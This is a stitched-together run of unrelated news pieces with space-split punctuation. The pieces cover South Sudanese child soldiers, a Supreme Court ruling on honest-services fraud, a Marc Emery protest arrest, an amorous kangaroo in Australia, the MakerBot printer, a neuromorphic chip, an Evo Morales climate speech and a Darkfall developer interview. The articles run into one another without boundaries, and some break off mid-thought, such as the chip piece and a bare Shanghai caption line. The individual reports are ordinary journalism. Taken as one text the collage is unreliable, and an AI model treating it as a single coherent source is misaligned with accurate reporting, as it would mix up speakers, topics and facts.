UNICEF estimates that about 9,000 children were serving in the north ’s army while some 3,000 children were in south ’s rebel military in 2005 , the year a peace agreement was signed to end the war .
Simon spent five years in the south ’s military , carrying other soldiers ’ bags , washing their clothes , cooking their food and collecting firewood for them .
He said refusing to work meant three or four people would beat him .
Eventually , he was trained to use a gun .
Simon was given his own AK - 47 assault rifle and was sent to the frontlines to battle the Messiria , a tribe of Arab nomads who bring their cattle to graze on land in southern Sudan .
Simon said he shot at them but never killed anyone .
“ I think it was very bad for me to be in the military when I was 12 or 13 years old , but there was no other option for me , ” said Simon , who is now 16 .
“ But if I wanted to go away , these people they would look for me , really .
I found it difficult for me to be in the army when I was that young . ”
As part of the 2005 peace agreement , a demobilization , disarmament and reintegration process was started to take children like Simon out of the barracks and bring them back home .
But , in a May report , the United Nations said the SPLA continues to be a “ persistent violator ” of children in armed conflict .
The research organization Small Arms Survey issued a report in June saying that progress for the demobilization has been “ slow ” and that the communities were n’t receiving enough support for returning ex-combatants .
In late April , more than five years after the signing of the peace accord , Simon was demobilized from the military along with 90 other children in the capital of Unity State .
While the government tries to reintegrate the demobilized children with their immediate families , Simon ended up with his aunt and uncle in a new city , because Simon is an orphan .
Simon ’s aunt said it ’s tough to support another child in her family .
“ For us , we do n’t have any money that we can support him .
Even now , his father is looking for some money so that he can support him to go to school , ” she said .
While it took a little while for Simon to adjust to civilian life , the ex-combatant said he feels comfortable now and is glad to be home .
He goes to school at a nearby school and plays soccer every afternoon with his friends in a small grass field near his home .
“ I found it very nice for me to be home because I found some friends here , ” said Simon , “ and also my family told me they missed me a lot .
So even now , if they tell me to go back to the army , I will refuse because I missed my family a lot when I was in the army . ”
Some demobilized children do return to the military .
According to the UN , 33 former child soldiers who were demobilized last year were re-recruited by the south ’s army .
Charles Machieng , the head of the South Sudan Demobilization , Disarmament and Reintegration Commission for Unity State , said when he ’s preparing the children to leave the military , they ask him questions about their future back at home .
“ Children are actually asking us ‘ Why are you removing us from the army and taking us to the village where we are not getting clean water , where we are not getting school , we ’re not getting medication , and we ’re not getting enough food ? ’ ” said Machieng .
The demobilization commission does n’t have the resources to support the former soldiers .
It relies on international organizations like the UN ’s World Food Program to provide the children with a few months supply of food .
The government commission is requesting more aid from the international community to provide more material support to keep the children from returning to the barracks .
In another village elsewhere in southern Sudan , this lack of resources is clear .
“ When I was released from the army , I was told that I would be supported by the [ non- governmental organizations ] and also that they can take me to school , ” said John , who was demobilized from the SPLA two years ago and whose name has also been changed .
“ But up to now , I ’m still waiting .
I ’m just sitting idle at home .
I have nothing to do .
I ’m thinking that I might want to go back to the army . ”
Unlike Simon , John was n’t forced into the military .
His father killed someone .
To escape a revenge killing , he joined the military .
All children in the military have been compelled to join , according to Bismarck Swangin , a spokesperson for UNICEF in southern Sudan .
“ It ’s no different from holding them hostage , ” he explained .
“ Because these are children who are taken away from the environment of their family , these are children who are kind of put within the confines of the military and therefore miss the opportunity to grow as a child , in terms of accessing family care , in terms of accessing education , in terms of accessing health services .
These children are denied that . ”
At a regional conference in Chad in mid-June , Sudan and five other African nations signed a declaration on ending the use of child soldiers .
The signatories pledged to stop the use of children in armed conflict , to release children in the armed forces and reintegrate them into their communities .
Several days after the declaration was signed , Human Rights Watch called on the U.S. to withdraw its military assistance to Sudan because the nation has not done enough to get child soldiers out of its ranks .
The SPLA signed an action plan last year with the UN to get all children out of its ranks before December 2010 .
Now out of the military and enjoying civilian life , Simon has big plans .
“ What I dream for , if I finish my studies , I can become like President Salva Kiir Mayardit or I can become president like Omar al Bashir , ” said Simon , who also aims to get a doctorate degree .
***
Zack Baddorf is a freelance journalist .
Photo by Pierre Holtz | UNICEF CAR , from Flickr
A Supreme Court ruling Thursday dealt a severe blow to legislation meant to fight public corruption and also could affect the recent convictions of former Enron chief Jeffrey Skilling and former newspaper magnate Conrad Black .
In ruling on “ honest - services fraud , ” the justices said Skilling and Black were wrongly convicted on that charge .
All nine justices agreed that such fraud was too vague to constitute a crime unless a bribe or kickback was involved .
But both men were convicted on other charges , and the Supreme Court sent their cases back to lower courts for further proceedings .
Former Gov. Rod Blagojevich currently is being tried on multiple charges of corruption , including depriving the public of honest services .
Over the last two decades , the law against honest - services fraud has been used routinely in cases in which public officials or corporate executives have been accused of secretly scheming to benefit themselves at the expense of the public or their stockholders .
Justice Ruth Bader Ginsburg , speaking for the court , said the law “ criminalizes only schemes to defraud that involve bribes or kickbacks . ”
It does not cover , for example , the case of public official who fails to disclose a possible conflict of interest .
In the cases of Skilling and Black , “ we express no opinion on the question of whether the error ” in their trials “ was ultimately harmless but leave that matter for consideration on remand , ” Ginsburg said .
Although the majority of justices agreed to narrow the law to cover only schemes where a public official or corporate executive enriched himself or herself at the expense of the public or the shareholders , Justices Antonin Scalia , Anthony M. Kennedy and Clarence Thomas would have gone further and struck down the law entirely , even when bribes or kickbacks were involved .
A former lead prosecutor in Chicago on the Conrad Black case argued that the ruling had “ very little impact ” in the cases of Black and Skilling .
Chicago attorney Eric Sussman said , “ Both were convicted of multiple offenses and , under the Supreme Court ’s ruling , if any of those other offenses is supported by the evidence , their convictions will stand . ”
The decision may have a wider effect in cases of alleged public corruption .
Until Thursday , the Justice Department had maintained that an official could be convicted of honest - services fraud for undisclosed schemes that could harm the public interest .
In a case from Alaska involving a former state legislator , Bruce Weyhrauch was charged with fraud for having contacted a firm about a possible job for after he left the Legislature .
He did not get the job , but he voted on a bill that was favorable to the firm .
A federal appeals court ruled he could be convicted of a crime based on this undisclosed conflict of interest .
However , the Supreme Court reversed that decision Thursday in a third of the three rulings limiting the scope of honest - services fraud .
david.savage@latimes.com
Ah yes .
The voice of the Republican party is at it again .
Of course , not before he suggested the oil rig explosion could have been an eco-terrorist .
Why not ask the Republicans on TV if they agree with Limbaugh ’s statements ?
Pundit Rush Limbaugh , who has a home on Florida ’s Palm Beach , suggested that the explosion could have resulted from Earth Day eco-sabotage by one of the rig workers .
Limbaugh also said a cleanup was unnecessary .
“ The ocean will take care of this on its own if it was left alone and left out there , ” Limbaugh said .
“ It ’s natural .
It ’s as natural as the ocean water is . ”
CANNABIS CULTURE – A “ Free Marc ” campaign organizer was arrested Thursday , June 10th at the Niagara Falls office of Canadian Justice Minister Rob Nicholson in what activists are calling “ assault and police intimidation . ”
Jacob Hunter , Policy Director of the Beyond Prohibition Foundation and organizer of recent Conservative MP office occupation protests , was accosted by a police officer while attempting to walk through the front door of the Member of Parliament ’s constituency office in Ontario .
Hunter was there as part of a continuing series of protests being held at the offices of Conservative Members of Parliament by supporters of Marc Emery , and was joined by a group of activists including Jodie Emery .
Hunter was reportedly arrested for “ assaulting a police officer ” .
Activists said another individual was also arrested at the scene .
MORE VIDEO OF THE ENTIRE EVENT WILL BE POSTED SOON at www.YouTube.com/JodieEmery!
– Jodie , Friday update
Jodie Emery , wife of imprisoned activist and former seed - seller Marc Emery , said an officer arrived at the scene and told protestors to stop filming , and claimed the video camera was “ a weapon ” .
Shortly thereafter he grabbed , shoved and arrested Hunter when he tried to follow the officer into Mr. Nicholson ’s office .
The entire incident was caught on video ( VIDEO COMING SOON ) despite the officer ’s attempt to prevent the events from being recorded .
Reports from people at the location suggest Hunter did not engage in any unlawful conduct .
“ The right to peacefully protest government action is basic and fundamental to our democracy , ” said Kirk Tousaw , the Executive Director of the Beyond Prohibition Foundation .
“ Mr. Hunter should not be subject to arrest and possible prosecution for engaging in political activity protected by the Charter and central to the workings of every democracy on Earth . ”
The Foundation is calling upon the Justice Minster to intervene and ensure that no charges are brought against either of the men arrested .
“ Mr. Nicholson makes much of his government standing up for the rule of law , ” said Tousaw .
“ The Charter is the supreme law of the land .
Being arrested for peaceful protest strikes at the very core of our democracy and is an utter rejection of the rule of law .
It is time for this government to make clear that the exercise of basic democratic rights will be protected , not prosecuted , in Canada . ”
More as the story develops …
‘ Free Marc Emery ’ protest goes awry
NiagaraThisWeek
What was supposed to be a peaceful demonstration outside MP Rob Nicholson ’s office on Thursday afternoon resulted in the arrest of two men .
Jacob Hunter of Vancouver and Eric Compton from Toronto were both arrested by officers from the Niagara Regional Police Services outside Nicholson ’s Niagara Falls office .
The protest , organized by the Free Marc Emery Campaign , was targeted at Nicholson , Niagara Falls MP , because in his role as Canadian Minister of Justice , Nicholson was the person who signed the extradition order for Emery .
Marc Emery is a Canadian cannabis activist and former cannabis seeds seller who was sentenced to five years in a United States prison on drug charges stemming from his cannabis seed selling business .
Thursday ’s planned protest was the latest in a series of similar demonstrations that have taken place across the country over the last few months .
On May 19 , Emery supporters successfully staged a sit-in at Prime Minister Stephen Harper ’s office in Calgary .
The Niagara Falls demonstration , however , is the first time someone has been arrested at such a protest .
“ We ’ve had seven demonstrations in British Columbia , around the Vancouver area , and we ’ve occupied four other offices across the country .
The police have been called every time , but we ’ve been able to have peaceful negotiations with them in each instance , ” said Davin Christensen , founder of the Toronto Hash Mob , one of the groups involved in the protest .
“ In ( Nicholson ’s ) office hangs the Canadian Charter of Rights and Freedoms and under Section 20 of that Charter , we have the right to enter and set up a meeting with any member of Parliament . ”
The protesters arrived in two waves : one small contingent in a car and a larger group in a bus .
Hunter , the first man arrested , was among the passengers in the car , which arrived at the demonstration site first .
Jodie Emery , wife of Marc , was also in the car .
She said that when they arrived , they tried to enter Nicholson ’s office , but it was locked .
After knocking on the door , a female office worker asked for identification .
Jodie pressed her identification against the glass but was told the office staff was n’t available at that time .
Moments later , according to Jodie , an police officer arrived on motorcycle .
At this point , the protesters began videotaping what was happening .
The video shows a police officer telling the protesters to put the cameras away because they are “ considered weapons . ”
The officer was about to enter Nicholson ’s office , but instead turned around and arrested Hunter for assaulting a peace officer .
The bus arrived as the arrest was happening and Compton , who was on the bus , was arrested shortly after for obstructing a peace officer while he was employing what Jodie referred to as the “ Hug Power ” technique , which is when a protester hugs someone who is being arrested .
The protest carried on as planned , but outside of the building instead of inside the office , while several NRPS officers looked on .
Royal Canadian Mounted Police Cpl. Pat Simpson was also on the scene .
“ I ’m just here to oversee the peaceful demonstration , ” he said .
“ Nothing seems to be out of hand here . ”
There were about 15 people demonstrating outside Nicholson ’s office , waving flags and shouting into bullhorns .
People came from Vancouver , Toronto , Hamilton and Waterloo to participate in the protest .
“ We need to get straight to politicians , who usually get to hide from the public in their private jets and in Parliament , ” said Jodie .
“ The only place to get close to them is to go to their offices , which are our offices , and we were locked out .
There ’s no reason to not let us in . ”
Hunter and Compton were released from police custody on Thursday afternoon and are scheduled to appear in St. Catharines court on Thursday , August 15 at 9 a.m .
– Article from NiagaraThisWeek .
The ' persistent ' randy kangaroo terrorising women in small Australian town
G'day ladies : Women in the township of Tennant Creek , between Darwin and Alice Springs , have been complaining of an amorous local
A kangaroo that is looking for love in all the wrong places is terrorising women in a small Australian country town .
The amorous animal has been spotted around the Honeymoon Ranges in Tennant Creek , in the Northern Territory , making every effort to woo a woman .
One resident told the local newspaper that she was walking along a bike trail when she realised she was being followed by the randy roo early one morning .
She said : ' I turned around and saw this big kangaroo behind me , so I hastened my steps .
' It seemed a bit odd , but I continued walking and did n't think much about it .
' Then on the return walk he was there waiting for me .
With his male pride on full alert , he started circling me .
' There was no doubt about what he wanted , the randy old thing .
' It was a huge kangaroo and quite intimidating .
I yelled at him to go away , waved my hands about and let him know I was n't interested , but he was persistent - I 'll give him that .'
The woman said it only bounded off when other walkers approached .
And it made another revealing appearance at a night - time speedway event .
Tanya Wilson , a mother of three , noticed the kangaroo had come to check out the action .
She said : ' I thought it was strange that a kangaroo would come to such a noisy place , but I grew up around kangaroos so I went up to say hello .
' There I was having a nice chat to him when I heard others calling out to me , warning me to step away .
I did n't take any notice of them because I did n't think I had anything to worry about .
I thought he was just a cute , friendly kangaroo . "
Tanya was oblivious to the clear arousal of the creature , but other speedway fans knew his intentions were not honourable .
She added : ' Apparently he was quite aroused .
I 'm actually glad I did n't notice . '
There were reports that a male speedway fan confronted the kangaroo in a bid to scare it away , but came off second best when it punched him in the face .
It would be very cool , Bre Pettis decided , to take his desktop manufacturing robot , his MakerBot , out of its big black case and plug it in right there in the Amtrak dining car .
It would be , like , ’ bots on a train .
I was at Boston ’s South Station , when I realized I was standing next to an Internet famous person .
I ’d seen Mr. Pettis ’s Web videos for Make , a magazine for digital do - it - yourselfers .
He has a face you remember .
Thick black glasses , unruly hair and sideburns .
He and his business partner Zach Hoeken , in a porkpie hat , were going home to Brooklyn after showing their MakerBot  a 3 - D printer  at M.I.T .
In the dining car , Mr. Pettis started connecting cables as he explained .
A computer slices a digital image into thin layers , which a MakerBot reads and replicates .
It squirts hot plastic , the kind Legos are made of , onto a platform that moves up , down and sideways , building a replica one squiggly layer at a time .
It can model anything you want : gears , or a goblet .
Big factories use similar machines to make prototypes .
MakerBot is a little factory for your home .
Bre and Zach have a company that sells them , $ 750 for the basic kit .
A guy walked by and ogled the box glowing with L.E.D.’s .
“ These are n’t the droids you ’re looking for , ” Mr. Pettis said .
That struck him as funny .
He decided to recreate the “ Star Wars ” scene for an iPhone photo .
He had me gesture like Obi-Wan .
“ These are n’t the droids you ’re looking for , ” I said , realizing I was in the presence of a highly appealing geekiness .
Chips on the brain ( Image : Frazer Hudson )
IF YOU have a smartphone , you probably have a slice of Steve Furber ‘s brain in your pocket .
By the time you read this , his 1 - billion - neuron silicon brain will be in production at a microchip plant in Taiwan .
Computer engineers have long wanted to copy the compact power of biological brains .
But the best mimics so far have been impractical , being simulations running on supercomputers .
Furber , a computer scientist at the University of Manchester , UK , says that if we want to use computers with even a fraction of a brain ’s flexibility , we need …
Shanghai in 1990 Shanghai in 1996 Shanghai in 2010
“ The response to global warming is global democracy for life and for the Mother Earth . … we have two paths : to save capitalism , or to save life and Mother Earth . ” — Speech by Evo Morales , president of Bolivia , to the G77 + China at the United Nations , May 7 , 2010 .
By Evo Morales , president of Bolivia
[ Text from Climate and Capitalism . ]
May 7 , 2010 -- I have come here to share the conclusions of the First World People ’s Conference on Climate Change and the Rights of Mother Earth , held last April 20 to 22 in Cochabamba , Bolivia .
I convened this conference because in Copenhagen the voice of the peoples of the world was not listened to or attended to , nor were established procedures respected by all states .
The conference attracted 35,352 participants , and of those , 9254 were foreign delegates , representing movements and social organisations from 140 countries and five continents .
The event also benefited from the participation of delegations from 56 governments .
The debates that took place at the conference were organised into 17 working groups .
The “ People ’s Accord ” adopted by the World People ’s Conference on Climate Change and the Rights of Mother Earth is a summary of the conclusions of each of those 17 working groups .
From among all of the documents , I would like to place special emphasis on the project of the Universal Declaration on the Rights of Mother Earth .
We , the Plurinational State of Bolivia , formally presented these conclusions last April 26 , along with a technical proposal , to the negotiation process taking place under the United Nations Framework Convention on Climate Change .
The Government of the Plurinational State of Bolivia convened this conference because the so - called developed countries did not comply with obligations to establish substantial commitments to reducing greenhouse gas emissions at last year ’s Copenhagen conference on climate change .
If these countries had respected the Kyoto Protocol and had agreed to substantially reduce emissions within their borders , the Cochabamba conference would not have been necessary .
I am personally convinced that the only way to guarantee a positive result in Cancún , México is through the broad participation of the world and the ironclad unity of the countries of the G77 + China .
We in the G77 + China are a group of 130 developing countries that are the least responsible for climate change and , nonetheless , the most affected by the dire impacts of global warming .
We represent two - thirds of the countries comprising the United Nations , and close to 80 % of the world ’s population .
In our hands is the task of saving the future of humanity and planet Earth , and making the voices of our peoples heard and respected .
That is why I have come here to address the G77 + China !
We all know that , within the G77 + China , there is a great diversity of political , economic and cultural positions .
This is our strength : unity through diversity .
I know that different criteria exist within our group , but I also know that , when we agree , there is no force that can stop us or detain us .
This strength is like the unity of so many sardines before sharks .
This is what happened at the last climate change meeting in Bonn from April 9 to 11 , at which we were slow to reach an agreement , but once we achieved consensus in the G77 +
China , the rest of the developing countries had to submit to our consensus .
I would like to begin by highlighting the points of convergence between the G77 + China and the World People ’s Conference on Climate Change and the Rights of Mother Earth .
The first point of convergence is the need to preserve and fulfill the Kyoto Protocol .
That is to say , the need for developed countries to make substantial commitments to domestic greenhouse gas emissions reductions under the framework of the Kyoto Protocol .
In the G77 + China , nobody is proposing to liquidate or dilute the Kyoto Protocol .
We all agree that the Annex 1 countries that are historically responsible for causing greenhouse gas emissions should honour their commitments and obligations under international treaties on climate change .
The World People ’s Conference on Climate Change and the Rights of Mother Earth demands that developed countries reduce their domestic greenhouse gas emissions by 50 % based on 1990 levels for the second commitment period of the Kyoto Protocol .
Current offers for reducing greenhouse gases in developed countries would at best only amount to a reduction of 2 % based on 1990 levels .
The Cochabamba conference does not propose substituting the Kyoto Protocol with various voluntary reduction commitments that are not directed toward global goals , and in which no distinction is made between what the different developed countries must do .
The People ’s Accord states :
The United States , as the only Annex 1 country on Earth that did not ratify the Kyoto Protocol , has a significant responsibility toward all peoples of the world to ratify this document and commit itself to respecting and complying with emissions reduction targets on a scale appropriate to the total size of its economy .
The second point of convergence among the World People ’s Conference and the G77 +
China is the need for the reduction commitments made by developed countries to be as deep possible in order to stabilise the increase in temperature to , where possible , within a range of 1.5 to 1 degree Celsius .
We developing countries present here are aware that an increase in temperature will bring grave consequences for the provision of food , for coastal zones , for glaciers , and all of Africa .
All of us here in the G77 +
China are resolved to avoid letting a single island state fall into the ocean .
A third point of convergence among the G77 and the conference is the concept of the climate debt that developed countries owe to developing countries .
This concept was much discussed at the World People ’s Conference on Climate Change , and it became clear that the concept has the following components .
The first component is the need to give back the atmospheric space that has been occupied by the developed countries and their greenhouse gas emissions , affecting developing countries .
Developed countries should decolonise the atmosphere to allow for an equitable distribution of the atmospheric space among all countries in accordance with the size of their population .
The second component is the debt with regard to forced migration due to climate change .
The number of forced migrations has reached 50 million worldwide , and could increase to 200 million to 1 billion people by the year 2050 .
To honour this debt , developed countries , as the generators of climate change , must open their borders to receive the affected migrants .
The existence of migration laws like that of Arizona or the Return Policy in the European Union is absolutely unacceptable .
The third component is the debt to our Mother Earth .
This is because not only have human beings and developing countries been affected , but so has nature .
To honour this debt , the First World People ’s Conference considers it fundamental to discuss here in the United Nations a proposal for a Universal Declaration on the Rights of Mother Earth that establishes obligations for all human beings with regard to nature and that recognises , in the form of rights , the limits that human activity must have if we are going to preserve planet Earth .
Some of the rights of nature that it proposes are :
The right to life and to exist .
The right to regenerate its bio-capacity and to continue its vital cycles and processes free from human disruptions .
The right to be free from contamination , pollution and toxic or radioactive waste .
The right to not have its genetic structure modified or disrupted in a manner that threatens it integrity or vital and healthy functioning .
We hope that this proposed Universal Declaration on the Rights of Mother Earth will begin to be discussed and analysed within the General Assembly of the United Nations .
Finally , we have the fourth component , the economic component of climate debt , which is comprised of the adaptation debt and the development debt that the industrialised countries have to developing countries .
On the topic of financing , the World People ’s Conference considers that , to confront climate change , a budget should be designated similar to the budget that countries allot for military and security spending .
The amount of $ 10 billion that developing countries are currently offering is less than 1 % of the total amount of their defence budgets .
It is simply not possible to dedicate 120 times more resources to war and death than to preserving life and our Mother Earth .
Developed countries should commit to annual financing from public sources in addition to the Official Development Assistance in order to confront climate change in developing countries .
This financing should be direct and without conditionalities , and should not violate the sovereignty of states .
It is necessary to establish a new financing mechanism that functions under the authority of the Conference of Parties of the United Nations Framework Convention on Climate Change and with significant representation by developing countries to guarantee compliance with the financing commitments of Annex 1 countries .
The World People ’s Conference proposes the creation of a multilateral and multidisciplinary mechanism for technology transfer .
These technologies should be useful , clean and socially appropriate .
The Cochabamba conference considers it essential to create a fund for the financing and inventory of appropriate technologies free from intellectual property rights , particularly by moving patents from private monopolies into the public domain for free access .
The World People ’s Conference notes that developed countries increased their emissions by 11.2 % in the period from 1990 - 2007 despite having claimed that reductions would be assisted by market mechanisms .
The carbon market has become a lucrative business that commodifies nature , favours a few intermediaries , and does not significantly contribute to the reduction of greenhouse gases .
The recent financial crisis has demonstrated that the market is incapable of regulating the financial system , and that it would be totally irresponsible to leave care for and protection of the very existence of humanity and our Mother Earth in the hands of the market .
In this regard , the conference considers it inadmissible that the current negotiations attempt to create new mechanisms that broaden and promote the carbon market .
The first conference proposes the substitution of REDD ( Reducing Emissions from Deforestation and Forest Degradation ) by a new mechanism that is not based on the promotion of the carbon market , and that respects the sovereignty of states and the right of the peoples to free , previous and informed consent .
This new mechanism should directly transfer technologies and economic resources from developed countries for the restoration and maintenance of forests and woodlands .
The topic of agriculture and climate change was also widely discussed , and the concept of food sovereignty was adopted .
This goes beyond food security by implying not just the right to nourishment , but also the right of the peoples to control their own seeds , lands , water and technology for food production in harmony with Mother Earth and at the service of the whole community , not just the sectors with the highest income .
In this regard , it was put forth that , to confront the climate change crisis , it is necessary to bring about a profound shift away from agriculture solely based on business and profit , strengthening instead agriculture for life , communities and equilibrium with nature .
In the negotiations and in the application of the accords on climate change , it is necessary to fully guarantee the rights of the indigenous peoples .
The conference also proposes a new theme to be discussed in the climate change negotiations and more broadly in the General Assembly of the United Nations : the establishment of a Climate and Environmental Justice Tribunal to try developed countries that fail to meet their commitments and sanction states and corporations that negatively affect the vital cycles of the Mother Earth .
Among our peoples there is much worry because the international accords to which we have subscribed are not ultimately complied with .
For this reason there is an interest in creating binding mechanisms that guarantee compliance and are capable of sanctioning violations to international treaties relating to climate and the environment .
Another proposal has to do with the need to convene a referendum on climate change so that the world ’s population can decide what should be done about this important issue .
The Cochabamba conference challenges us to begin to imagine and to promote a kind of global democracy in which the major issues facing humanity can be decided by all peoples .
To bring about all of these proposals , the conference resolves to initiate the construction of a World People ’s Movement of the for Mother Earth .
The Cochabamba conference places special emphasis on analysing the topic of development and what kind of development it is that we want .
Some of the principles agreed upon were :
There can not be unlimited development in a finite planet .
The model of development we want is not that of the so - called developed countries , which is unsustainable in a planet with limited natural resources .
So that developing countries might satisfy the needs of their populations without affecting planet Earth , it is essential that developed countries lower their levels of consumption and waste .
To achieve development in harmony with nature , we must also seek harmony among human beings through an equitable distribution of wealth .
The First World People ’s Conference proposes that the climate change negotiations analyse the structural causes of global warming and develop alternative proposals of a systemic character .
For the First World People ’s Conference , the root cause of the climate crisis is the capitalist system .
What we are seeing is not just a climate crisis , an energy crisis , a food crisis , a financial crisis … but also the systemic crisis of capitalism itself , which is bringing about the destruction of humanity and nature .
If the cause is systemic , then the solution must be systemic as well .
For this , the People ’s Conference discussed the theme of alternatives for living well in harmony with nature .
To conclude , the conference considers that to construct the future we must learn from the past , which remains present among us in the example of Indigenous peoples that have in all parts of the world preserved their forms of living in harmony with nature .
Esteemed ambassadors of the G77 +
China , I believe that the best way to strengthen our unity and our actions in the negotiations is by strengthening our consensus and discussing our different positions in a frank and sincere manner .
On this path , it is fundamental that situations like that of Copenhagen last year not be repeated .
We should respect the position agreed upon in the Bali Plan of Action and defended by the G77 + China , and ensure that climate change negotiations continue through the two established channels of “ Long - Term Cooperative Action ” and the Kyoto Protocol .
Our unity gives us the strength to guarantee that the negotiations will be broadly participatory , transparent and respectful of the equal rights of all member states of the United Nations , whether large or small , and to ensure that the voice of our peoples is heard and respected .
In the unity of the developing countries lies our potential to forge a new world in which harmony exists among human beings and with our Mother Earth .
Ambassadors :
The response to global warming is global democracy for life and for the Mother Earth .
Let us choose to be clean and active today for the sake all of humanity , not toxic and reactive tomorrow , against nature .
Esteemed ambassadors , we have two paths : to save capitalism , or to save life and Mother Earth .
Thank you very much .
It ’s a year since we last really seriously looked at Darkfall .
It ’s a year which has seen the game released in North America , continue its expansion and has recently opened its gates to the world with a 14 - day free trial .
We thought it was time to speak to the Darkfall team about what they ’ve been up to , their aims and the big misapprehensions about their game .
Tasos Flambouras agreed , and after gathering to discuss matters with Producers Claus Grovdal and Kjetil Helland , returned with answers …
RPS : Starting from the most recent news – you ’ve just started offering a 14 day trial .
Can you explain the thinking behind it ?
Why was now the right time ?
Why not before ?
Tasos Flambouras :
We ’re obviously doing it to make it easier for new players to try Darkfall out , and easier for existing players to recommend the game .
We also have improved the overall game and newbie experience quite a bit so this is a good time , but it ’s not the reason we did n’t have the trial before .
We wish we could have had a free trial earlier .
However we wanted to have done as much as we could to protect the existing player base before we offered it .
Our trial does n’t take place on a secluded island or on a separate world ; it ’s the full game so a free trial was a concern in a competitive game like Darkfall .
We had to do lot of work before enabling the free trial to ensure there would be no incidents of trial accounts interfering with the subscriber experience .
We tested the waters with our 1euro / dollar trial , where you had to pay a symbolic price to try Darkfall and it went very well .
We ’re very happy with the way our free trial is going too .
RPS : You grab someone in the pub and have to explain Darkfall to them in a couple of sentences .
How would you do it ?
Tasos Flambouras :
It ’s a big game , and you ca n’t really sum it up efficiently without sounding like an advert .
Still , if I were to explain Darkfall to a friend of mine in a couple of sentences this is probably how I would do it :
Darkfall is an MMOG with real - time FPS gameplay , skills rather than levels , full loot , an alignment system , the largest battles ever , clan warfare , sieges , mounted combat , naval battles , and you can actually do more things in this game than you can in any other MMOG .
It ’s not for everyone , but those that enjoy it swear by it and often mention that it ’s the most fun they ’ve had in any game .
RPS : What ’s been the biggest changes in Darkfall recently ?
The majority of our readers will be familiar with Darkfall around the time of the coverage at the mid-point last year .
How has the game grown since ?
Tasos Flambouras :
We ’ve had two large free expansions and more than thirty content patches since then .
The biggest changes have happened gradually with the exception of the total revamp of the siege / conquest system .
We did that because we felt we could do it better and we believe we ’ve improved it significantly .
We added player housing that we ’ve kept adding features to and have incorporated it into the Village System , where clans fight to control each village .
Through a series of changes we ’ve balanced PvP playstyles in a meaningful way , we balanced mounted combat , and we introduced several large PvP elements like Sea Fortresses and villages , and we also added trade routes which aside from giving another PvP opportunity , also help boost the economy .
We ’ve slowly started differentiating Darkfall ’s races .
This is a major project and quite the balancing act .
We ’ve added character specializations , which are leading to Darkfall ’s prestige classes , a deep character specialization system , and major upcoming Darkfall feature .
We ’ve done a lot of work on character progression , making it less tedious .
We ’ve made it much easier for new players to catch up to veterans , at the same time making new players more viable .
Brand new players now also have 12 gameplay hours of protection from attacks which is ample time for them to learn the basics .
We ’ve added a lot more naval content , like more ships , we ’ve made the ships more accessible by making the materials needed to craft them cheaper and more common .
We ’ve added Sea Villages , Sea Fortresses and sea monsters .
We ’ve introduced dynamic lore events where players or clans not only become part of the lore and the world events , but they can change the actual course of events , the history and the future of the game .
All the things I mention above are all being improved continuously , we do n’t mean to sound as if we ’ve solved everything or that we ’re satisfied .
We never are .
Also , as cliché as this may sound : the best is yet to come .
We have another free expansion coming soon , and what we ’ve code - named Darkfall 2010 towards the end of the year , our largest post - release project to date .
RPS : Describe your ideal player .
Do you have an ideal player ?
I kind of feel you do .
While many developers seem to design to be malleable to players , it strikes me that Darkfall is a game which demands the players to be malleable .
Tasos Flambouras :
We keep saying that Darkfall is n’t for everyone but that ’s unfair to the work we ’ve been doing to make it more appealing to a wider base without compromising what we feel makes the game special .
We do n’t really have an ideal player , but the players who would get the most out of Darkfall are intelligent players that enjoy freedom , action , more options , more challenges , do n’t need or want constant hand - holding , do n’t need constant direction by the game , and can look past the first few hours of trying to learn the ropes .
When you play any MMOG , you ’re making an investment , these are not casual games and they continuously evolve .
The potential of the game is very important .
Our most loyal players are ones that can appreciate the work we ’ve been doing since release , and see not only what we have to offer today , but also what ’s coming in the future , and what ’s possible .
Some of the game ’s most vocal critics have multiple accounts on both servers and have been playing Darkfall since day one .
There ’s a lot of passion surrounding this game , and this is very much true with the fans of the game .
It ’s almost as if they do n’t accept that we created Darkfall and that we know what we ’re doing , but that it ’s their game and they ’ve entrusted it to us .
And you know what , they ’re actually right .
It is their game and we take our responsibilities towards them very seriously because without them , there is no game .
RPS : Can we talk about the fundamentals for a second ?
What ’s the core of the game for you ?
As in , what do you think is the absolute core philosophically with Darkfall which everything else grows out of ?
Tasos Flambouras :
If we have to choose one , we all agree on player freedom .
It ’s what we continuously strive for and it guides everything we do .
The amount of things you can do , the freedom to develop your character any way you want , freedom in movement , no artificial barriers , no zones , no instances , as little gameplay restrictions as possible , no prerequisites or limitations before you can start having fun .
We think that our answer to the next question also applies to this one …
RPS : The MMO – like any genre – changes over time .
What do you think changed in the 6 years you took to make it ?
How has it changed since your launch ?
How do you think it ’s going to change in the near future ?
Or do you consider Darkfall a singular proposition which exists more to one side ?
Tasos Flambouras :
It ’s pretty amazing to us how little the MMO genre has changed over time .
It seems to be the same successful basic recipe with little variation .
Do n’t get me wrong , there are a lot of good games , but they do n’t really bring many new things to the table .
Everyone wanted to make the Everquest killer and now they want to make the World of Warcraft killer .
To do that they probably have to make a variation on the theme rather than innovate and dare to be different .
It ’s too risky to try new things in a long development cycle and most of the major development efforts are very conservative .
One of the very few things we ’ve seen change is PvP finally entering the MMO mainstream .
When we started out PvP was something you almost had to apologize for offering .
We would get hate - mail about it .
Now everyone wants to attach some PvP element to their game because there ’s obviously a market for it .
When we started designing Darkfall we looked at it from a player perspective , and we were actual players and had invested heavily in the games we were playing , not just developers checking out other games .
We started asking a lot of questions : .
Why ca n’t we do this or that ?
Why do n’t they do it this way , questions players ask of their games every day .
We set out to answer these questions , learn from the mistakes other games had made , and to actually make our wish list game .
Of course Darkfall is very different , we went off in a different direction and we keep following the wishlist , adding to it , and we ’ve been listening to our community and playerbase very carefully .
We made mistakes because we tried a lot of new things but we ’re constantly learning from our experience .
The monumental effort that went into making Darkfall is dwarfed by the effort that is going into its evolution .
We ’re not just supporting the game , we ’re engaged in full - blown game development .
I ’m not trying to suggest that we ’re doing things better or that we try harder .
What I ’m saying is that we took a lot of risks in an effort to make an innovative game and we keep taking these risks by staying true to course .
Whether what we did pushes the genre any further , only time will tell .
In the meanwhile we have players of ours leaving Darkfall for the next big thing , and shortly after returning to our game because , so far , they ca n’t get what we offer anywhere else .
We ’re not talking about millions of players here but the fact that we ’ve actually launched this game and it ’s successful to the point that we can continue doing what we love , makes us successful .
Who knows what we could have accomplished with more resources , but we ’re grateful for what we have right now .
RPS : What ’s the biggest misapprehension about Darkfall ?
Tasos Flambouras : Darkfall is not the strictly hardcore game it ’s made out to be .
We have numerous casual players who enjoy the game as much or even more than the hardcore players .
